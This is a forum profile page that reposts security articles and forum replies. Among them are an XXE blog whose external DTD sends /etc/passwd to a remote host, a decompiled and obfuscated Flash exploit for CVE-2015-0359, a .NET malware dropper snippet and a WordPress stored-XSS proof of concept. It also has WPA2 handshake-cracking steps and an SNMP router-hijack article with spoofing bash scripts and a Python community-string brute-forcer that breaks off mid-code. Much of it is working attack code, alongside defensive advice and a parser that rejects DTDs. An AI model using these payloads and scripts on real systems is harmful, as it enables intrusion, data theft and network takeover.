Everything posted by Nytro
-
And the bozgors?
-
Forcing XXE Reflection through Server Error Messages
Nytro replied to Nytro's topic in Securitate web
If it displays the file name (which contains that entity, i.e. the contents of /etc/passwd), then it should be displayed in full. Yes, it also depends on that, but it's an idea that can be useful.
-
Forcing XXE Reflection through Server Error Messages
Antti Rantasaari | May 4, 2015

XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&netspi;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>

However, it's also very common for nothing to be returned in the error response if the application doesn't reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it's possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed.

Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the "netspi.dtd" file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at Not Found.

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'>
%param1;
%external;

Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>

At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com. Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page.

I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it's also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'>
%param1;
%external;

If the server displays verbose errors to client, the error may contain the file contents of the file that's getting extracted. Below is an example:

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....

The invalid file path causes a "FileNotFoundException", and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it

References
https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

Source: https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
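Every variant in the article above, the in-line entity, the remote DTD and the error-message trick, starts with a DOCTYPE in the request body, so the receiving side can refuse all of them with one rule: no DTD processing for untrusted input. The Python below is an added example (not code from the NetSPI article or the forum post) of that rule: a throwaway expat pass aborts on the first DOCTYPE or external entity reference, and only documents that pass are handed to ElementTree. The UnsafeXML class, the function names and the sample documents are mine; the host attacker.example in the external-DTD sample is a constructed placeholder.

```python
"""Refuse DTD features in untrusted XML before the real parser sees the document.

Added example, not code from the NetSPI article or the forum post.
Function names, the UnsafeXML class and the sample documents are constructed here.
"""

import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """An untrusted document used a DTD feature that is never allowed here."""


def check_untrusted_xml(data: bytes) -> None:
    """Expat pre-pass that aborts on the first DOCTYPE or external entity reference.

    Both XXE styles in the article need a DOCTYPE: the in-line one declares the
    entity in the internal subset, the out-of-band one points the DOCTYPE at a
    remote .dtd. Rejecting DOCTYPE outright covers both, so the parameter-entity
    wrapping (%param1; / %external;) never gets a chance to run.
    """
    parser = expat.ParserCreate()
    # Never fetch or expand the external DTD subset, whatever the document asks for.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        where = "external subset %r" % sysid if sysid else "internal subset"
        raise UnsafeXML("DOCTYPE %r with %s is not allowed" % (name, where))

    def on_external_ref(context, base, sysid, pubid):
        # Defence in depth: reached only if a DOCTYPE somehow slipped past on_doctype.
        raise UnsafeXML("external entity %r is not allowed" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)  # raises expat.ExpatError on malformed XML


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse with ElementTree only after the pre-check passed."""
    check_untrusted_xml(data)
    return ET.fromstring(data)


def verdict(data: bytes) -> str:
    """'ok' for a plain document, 'rejected: <reason>' for DTD use, 'malformed' otherwise."""
    try:
        parse_untrusted_xml(data)
        return "ok"
    except UnsafeXML as exc:
        return "rejected: %s" % exc
    except (expat.ExpatError, ET.ParseError):
        return "malformed"


# Constructed samples modelled on the article's request bodies.
INLINE_XXE = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root><search>name</search><value>&xxe;</value></root>"""

EXTERNAL_DTD = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://attacker.example/netspi.dtd">
<root><search>name</search></root>"""

BENIGN = b"""<?xml version="1.0" encoding="UTF-8" ?>
<root><search>name</search><value>root</value></root>"""


if __name__ == "__main__":
    for label, doc in (("inline XXE", INLINE_XXE), ("external DTD", EXTERNAL_DTD), ("benign", BENIGN)):
        print("%-13s %s" % (label, verdict(doc)))
```

The pre-pass is deliberately separate from the real parse: it costs one extra scan but keeps the policy independent of whichever XML library the application actually uses, and it reports why a document was refused, which is what you want in the request log when these payloads show up.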
-
Flash_Exploit.SWF CVE-2015-0359 PoC BY: _D3F4ULT package { public class $1$6$7$@120984$cQhWvZ56 { } $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object]; 34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip]; 3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object]; 6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray]; }//package import flash.display.*; import flash.system.*; import flash.utils.*; package { public class 34643$OfA2FuRBJ#@ extends MovieClip { private var 13AFv7jyfFP; private var YWH9DbQhT:Class; private var 65%$uHPix2Gq4k%ss = "ToStage"; private var _StrPool46:uint = 0; private var %%Awjftgdfe^&:uint = 0; private var X4O3S0e:uint = 0xFF; private var 3eMXkL2fIA; private var 86OI8FG3RS4; public function 34643$OfA2FuRBJ#@(_arg1:Object=null){ Security[((("al" + "low") + "Dom") + "ain")]("*"); var _local2:* = ApplicationDomain[(("current" + "Do") + "main")]; this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss); var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class); this.13AFv7jyfFP = new (_local4)(); this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class); if (this["stage"]){ this.4kjf1flZV1ZTA7(); } else { this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); }; } public function EmptyHandler(_arg1:Object, _arg2:int):void{ _arg2++; } private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{ this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); this["addEventListener"]("enterFrame", this.TVN3N5UQ); var _local2:* = new 6KovfYYrEFkW(); var _local3:* = new this.YWH9DbQhT(); this.$$!!323tr(); this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3); this.gzZrsob66e0cB6oT(_local3); var _local4:uint = 91; var _local5 = 0; if ((_local5 < _local3["length"])){ var _local6:uint = (_local3[_local5] ^ _local4); _local4 = _local3[_local5]; _local3[_local5] = _local6; _local5++; //unresolved jump }; var _local8 = "com"; _local3[((("un" 
+ _local8) + "pres") + "s")](); this.13AFv7jyfFP[("load" + "Bytes")](_local3); this[("add" + "Child")](this.13AFv7jyfFP); //unresolved jump !ERROR! return; } private function TVN3N5UQ(_arg1):void{ if ((this.currentFrame == 200)){ this.gotoAndPlay(new Number(2)); return; }; } private function $$!!323tr():void{ this.3eMXkL2fIA = new this.YWH9DbQhT(); this.86OI8FG3RS4 = new this.YWH9DbQhT(); var _local2:int; _local2 = 65; if ((_local2 < 91)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 97; if ((_local2 < 123)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 48; if ((_local2 < 58)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 33; if ((_local2 < 48)){ if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 58; if ((_local2 < 65)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 91; if ((_local2 < 97)){ if ((_local2 == 92)){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 123; if ((_local2 < 127)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; this.86OI8FG3RS4["writeByte"](34); var _local3:int; _local3 = 0; if ((_local3 < 0xFF)){ this.3eMXkL2fIA[_local3] = 0xFF; _local3++; //unresolved jump }; _local3 = 0; if ((_local3 < this.86OI8FG3RS4["length"])){ this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3; _local3++; //unresolved jump }; } public function gzZrsob66e0cB6oT(_arg1):uint{ var _local2:uint = 0; if (!((this.X4O3S0e == 0xFF))){ _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); _local2 = (_local2 + 1); }; return (_local2); } public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{ var _local4 = 0; var _local5:uint = 0; _local4 = 0; if ((_local4 < _arg2)){ if ((this.3eMXkL2fIA[_arg1[_local4]] == 0xFF)){ } 
else { if ((this.X4O3S0e == 0xFF)){ this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]]; } else { this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"])); this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14)); var _local7 = _local5; _local5 = (_local7 + 1); _arg3[_local7] = (this._StrPool46 & 0xFF); this._StrPool46 = (this._StrPool46 >> 8); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8); //unresolved if this.X4O3S0e = 0xFF; }; }; _local4++; //unresolved jump }; return (_local5); } } }//package package { public class 3m3qT@@9jm4 { } }//package package { public class 6KovfYYrEFkW extends ByteArray { public function 9IRh0mi4XOG():void{ } public function A3Ig1if():int{ return (0); } } }//package "twitter.com/_d3f4ult"Via: http://pastebin.com/5nnP7X0x
-
Writing a Metasploit post exploitation module
April 6, 2015
Ionut Popescu

The exploitation of a machine is only a step in a penetration test. What do you do next? How can you pivot from the exploited machine to other machines in the network? This is the step where you need to prove your post exploitation skills. Even if Metasploit is a complex framework, it is not complete and you can extend it.

Why would I write one?

Metasploit is the "World's most used penetration testing software"; it contains a huge collection of modules, but it is not complete and you can customize it by writing your own modules. Even if you manage to compromise a machine, you may ask yourself: "Now what?". You can use one of the many Metasploit post exploitation modules, but what if you don't find a suitable module for you? You may request it from the Metasploit community and developers, but it may take a lot of time until it becomes available. So why don't you try to write your own module?

Full article: Writing a Metasploit post exploitation module – Security Café
-
It's relative. The opcode "eb 17" == "jump 0x17 bytes". 8048062 (the next address) + 0x17 == 8048079. It's odd that it's "jmp 8048079" and not "jmp 08048078", because at "08048078" is the call that pushes "/bin/sh" onto the stack. Ah, damn. If you look at the shellcode in the C program: \xeb\x16\x5e\x31. That is "eb 16", i.e. "jmp 08048078".
-
Malware. It copies a piece of crap (badly bound, non-encrypted) into AppData. The thing is written in .NET and it's easy to see:

public object Xtraer()
{
    object obj2;
    int num2;
    try
    {
        int num3;
    Label_0001:
        ProjectData.ClearProjectError();
        int num = -2;
    Label_0009:
        num3 = 2;
        FileSystem.FileOpen(1, this.Ruta1 + @"\ndwkdwmm.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
    Label_0028:
        num3 = 3;
        FileSystem.FilePut(1, this.Dat[1], -1L, false);
    Label_003D:
        num3 = 4;
        FileSystem.FileClose(new int[] { 1 });
    Label_0052:
        num3 = 5;
        Interaction.Shell(this.Ruta1 + @"\ndwkdwmm.exe", AppWinStyle.NormalFocus, false, -1);
    Label_006E:
        num3 = 6;
        FileSystem.FileOpen(2, this.Ruta2 + @"\lklslslowlsloloaolsl.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
    Label_008D:
        num3 = 7;
        FileSystem.FilePut(2, this.Dat[2], -1L, false);
    Label_00A2:
        num3 = 8;
        FileSystem.FileClose(new int[] { 2 });
    Label_00B7:
        num3 = 9;
        Interaction.Shell(this.Ruta2 + @"\lklslslowlsloloaolsl.exe", AppWinStyle.NormalFocus, false, -1);

Real scan: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/
-
WordPress 4.2 stored XSS
From: Jouko Pynnonen <jouko () iki fi>
Date: Mon, 27 Apr 2015 05:15:46 +0300

OVERVIEW
==========

Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed.

If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator's password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

DETAILS
========

If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core.

The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect.

In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first.

PROOF OF CONCEPT
==================

Enter the following as a comment:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a>

This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41.

SOLUTION
=========

Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments.

CREDITS
========

The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.

An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html

--
Jouko Pynnönen <jouko () iki fi>
Klikki Oy - http://klikki.fi - @klikkioy

Source: Bugtraq: WordPress 4.2 stored XSS
-
Awesome.
-
Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

Install

$ sudo python setup.py install

Sample use

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"

-r Where to read input pcap file with half handshake (works with full handshakes too)
-m AP mac address (From the 'fake' access point that was used during the capture)
-s AP SSID
-d (optional) Where to read dictionary from

Capturing half handshakes

To listen for device probes the aircrack suite can be used as follows

sudo airmon-ng start wlan0
sudo airodump-ng mon0

You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted.

Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything. In ubuntu this can be done here: 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook

Capture traffic on this interface. In linux this can be achieved with TCPdump

sudo tcpdump -i wlan0 -s 65535 -w file.cap

(optional) Deauthenticate clients from nearby WiFi networks to increase probes

If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks: deauthentication [Aircrack-ng]

Source: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
-
Contents

1. NtGlobalFlag
2. Heap flags
3. The Heap
4. Thread Local Storage
5. Anti-Step-Over
6. Hardware
   A. Hardware breakpoints
   B. Instruction Counting
   C. Interrupt 3
   D. Interrupt 0x2d
   E. Interrupt 0x41
   F. MOV SS
7. APIs
   A. Heap functions
   B. Handles
      i. OpenProcess
      ii. CloseHandle
      iii. CreateFile
      iv. LoadLibrary
      v. ReadFile
   C. Execution Timing
   D. Process-level
      i. CheckRemoteDebuggerPresent
      ii. Parent Process
      iii. CreateToolhelp32Snapshot
      iv. DbgBreakPoint
      v. DbgPrint
      vi. DbgSetDebugFilterState
      vii. IsDebuggerPresent
      viii. NtQueryInformationProcess
      ix. OutputDebugString
      x. RtlQueryProcessHeapInformation
      xi. NtQueryVirtualMemory
      xii. RtlQueryProcessDebugInformation
      xiii. SwitchToThread
      xiv. Toolhelp32ReadProcessMemory
      xv. UnhandledExceptionFilter
      xvi. VirtualProtect
   E. System-level
      i. FindWindow
      ii. NtQueryObject
      iii. NtQuerySystemInformation
      iv. Selectors
   F. User-interface
      i. BlockInput
      ii. FLD
      iii. NtSetInformationThread
      iv. SuspendThread
      v. SwitchDesktop
   G. Uncontrolled execution
      i. CreateProcess
      ii. CreateThread
      iii. DebugActiveProcess
      iv. Enum...
      v. GenerateConsoleCtrlEvent
      vi. NtSetInformationProcess
      vii. NtSetLdtEntries
      viii. QueueUserAPC
      ix. RaiseException
      x. RtlProcessFlsData
      xi. WriteProcessMemory
      xii. Intentional exceptions
   H. Conclusion

Download: http://pferrie.host22.com/papers/antidebug.pdf
-
Hacking networks with SNMP
Posted on April 21, 2015 by Torstein

Summary

Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment (CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider (ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques apply to other vendors like Juniper, HP, Linux and others.

Virtualization

To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network.

Attacker IP: 80.200.43.20

Cisco configuration example for SNMP and NTP:

interface GigabitEthernet0/0
 ip address 88.0.3.10 255.255.255.0
!
ip access-list standard management
 remark ### NTP ###
 permit 80.2.0.64
 remark ### SNMP ###
 permit 80.2.0.33
!
snmp-server community _________ RW management
!
line vty 0 4
 access-class management in
!
ntp server 80.2.0.64

Discovering devices

The initial scan plays an important role in discovering remote vulnerable devices. SNMP configured with an access-list will still indicate an open port when you connect to it. The access-list will of course deny any type of request you make to the device unless the packet comes from an allowed IP. One of the easiest ways to discover what type of network device you are up against is by running an NTP query. By configuring “ntp server x.x.x.x”, we are not only synchronizing the device to that time-server, but also turning the device into an NTP server itself. This allows us to find some unwanted information like equipment type and Refid, which is equal to the NTP server’s server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools – it won’t take long before you know where the management server pool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this.

ntp server 80.2.0.64
ntp access-group peer management

This can be avoided by configuring an access-list associated with the NTP configuration, firewalling the device or Control Plane Policing.

Hacking SNMP Blindfolded

Spoofing the UDP packets' source address will bypass the SNMP access-list “management”, and by blasting away thousands of passwords/sec we may find the SNMP community string. The question is, how do we know when we have found the correct community string? By sending IP-spoofed Object Identifiers (OIDs) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. I decided to do some performance testing on live equipment, and a Cisco 881-k9 was only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPEs like the 881-k9 and you will be able to test ~4 million passwords/min.

So, how is this really done?

Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10

Hello mr router. The secret is "public", please ping 80.200.43.20
 - wrong secret, request dropped -
Hello mr router. The secret is "private", please ping 80.200.43.20
 - correct secret, request accepted -
 - sending ICMP packet to 80.200.43.20 as you asked for -

Network sniffer detecting an ICMP packet from mr router (88.0.3.10)
Correct secret was found for mr router between line(RTT+0.1sec) and line(current time)

We got the community – so how to get access?

More spoofing! By sending another batch of spoofed OIDs to the router, we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted an Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OIDs, asking the router to download a file from the TFTP server and import it into the running-config.

How to protect your equipment

1. BCP 38/RFC 2827
Source-address filter your network: a router will stop any packets not matching the reverse route for the sender's source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This not only protects you and others against this type of attack, but also against UDP reflection DDoS attacks.
Warning: A network with asymmetrical routing may experience issues with BCP38.

2. SNMPv3
SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv1/2c due to password and packet encryption, discovery handshake and message integrity checks.

3. Filtering
Deny NTP and SNMP with Access Control Lists (ACL), Control Plane Policing (CoPP) or firewalls.

4. Testing
Do a network scan on equipment before you deploy a new model to check for unwanted services and ports.

Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices. There won’t be any security advisory/CVE since the UDP spoofing attack is a known issue – even considering it’s a new attack vector.

Cisco Guide to Harden Cisco IOS Devices
Team CYMRU – Secure IOS template

Concept code

Download config

#!/bin/bash
STRING=private
IP=88.0.3.10
SOURCEIP=80.2.0.64
TFTP=80.200.43.21
FILENAME=running-config

# rewrite the source address of outgoing SNMP packets to the permitted NTP/SNMP server
iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
# CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96): destroy any old row 111, then build a
# tftp (protocol 1) copy of running-config (4) to a network file (1) and activate it
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

Upload config

#!/bin/bash
STRING=private
IP=88.0.3.10
SOURCEIP=80.2.0.64
TFTP=80.200.43.21
FILENAME=change-config

iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
# same row as above, but source is the network file (1) and destination running-config (4)
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

Blind Password cracking – POC

#!/usr/bin/python
import socket, sys, time
from scapy.all import *
from multiprocessing import Process, Array

iptoping = '\x50\xc8\x2b\x14' # 80.200.43.20 in hex
ipaddr = ['88.0.3.14','88.0.3.6','88.0.3.10'] # target routers
spoofedserver = '80.2.0.64' # ntpq -c rv TARGET_CPE | grep refid
                            # Need to be permitted by router's snmp ACL
snmpfile = 'best-snmppasswords.txt'
defaultdelay = 0.0011
rtt = 1 #ms delay to targets

# check if loopback-interface with spoofed IP is up and running
stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    stest.bind((spoofedserver, 0))
except:
    print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up"
    sys.exit()

rtt = rtt/1000.0 # float division; integer division would give 0 on Python 2
defaultdelay = int(defaultdelay*1000000)

def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline):
    # add delays and such
    f = open(snmpfile, 'r')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    delay = delayhigh[c]/1000000.0
    s.bind((spoofedserver, 500+c))
    counter = 1
    for community in f:
        if stop[c] == True:
            return
        if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0:
            community = community.rstrip()
            snmp = []
            # packet length need to be included in SNMP.
            length = str("%0.2x" % (len(community))).decode('hex')
            splen = str("%0.2x" % (len(community)+42)).decode('hex')
            xplen = str("%0.2x" % (len(community)+49)).decode('hex')
            yplen = str("%0.2x" % (len(community)+45)).decode('hex')
            # SNMPv1 SetRequests building a CISCO-PING-MIB row (1.3.6.1.4.1.9.9.16)
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x06')
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x05')
            snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30'
                        '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65')
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x02\x82\x4d\x02\x01\x01')
            snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30'
                        '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x03\x82\x4d\x04\x04' + iptoping)
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x04\x82\x4d\x02\x01\x01') # last hex = number of icmp packets
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x01')
            for payload in snmp:
                s.sendto(payload, (ip, 161))
